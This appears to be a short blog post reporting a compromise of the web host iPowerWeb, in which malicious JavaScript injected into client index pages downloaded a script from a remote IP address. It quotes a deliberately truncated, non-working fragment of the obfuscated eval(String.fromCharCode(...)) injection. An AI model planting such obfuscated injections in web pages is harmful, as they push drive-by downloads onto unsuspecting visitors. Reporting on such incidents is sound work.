Sec?

I just read in webhostingtalk that one of the leading shared web hosting company iPowerWeb got hacked. Many of the clients websites got hacked due to Javascript vulnerability. As reported on PHPBB the hacker seemed to have implanted some kind of malicious javascript code on some of the pages of client’s sites. These Javascript code implanted on index pages of those hacked sites would further connect to some random IP addresses to download some script on client’s PC.

According to David (of HKBoards.com), one of his phpBB Forum hosted on iPowerWeb got following malicious code;


eval(String.fromCharCode(100,111,99,117,…,101,62,34,41))


The actual string of numbers in bold is 112 sets long. I reduced it for space and safety here. (Dont want anyone to acidently run it).

When decoded it gives a command for a script to be downloaded from an IP Address in Amsterdam.

iPowerWeb seems to be have planned to keep their lips tight until this whole issue gets resolved.